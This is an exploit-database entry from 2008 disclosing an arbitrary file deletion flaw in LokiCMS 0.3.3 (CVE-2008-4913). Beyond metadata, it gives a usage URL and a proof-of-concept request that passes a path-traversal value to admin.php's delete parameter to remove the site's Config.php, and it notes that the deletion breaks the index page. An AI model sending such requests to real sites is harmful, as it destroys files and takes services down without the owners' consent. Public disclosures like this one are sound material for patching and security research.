[] NeoSense

LokiCMS 0.3.3 - Arbitrary File Delete

Author: cOndemned
type: webapps
platform: php
port: 
date_added: 2008-04-28 
date_updated:  
verified: 1 
codes: OSVDB-49535;CVE-2008-4913 
tags: 
aliases:  
screenshot_url:  
application_url: 

Name   : LokiCMS 0.3.3 <= Arbitrary File Delete Vulnerability
Author : cOndemned
Greetz : ZaBeaTy, GregStar, irk4z, doctor, Avantura ;*

Usage:

    http://[target]/[lokiCMS]/admin.php?delete=[path]/[file]

PoC:

    http://[target]/[lokiCMS]/admin.php?delete=../includes/Config.php

    Deleting Config.php will casue situation when users won't be able to view index page
    normally. Only errors will be visible...

# milw0rm.com [2008-04-29]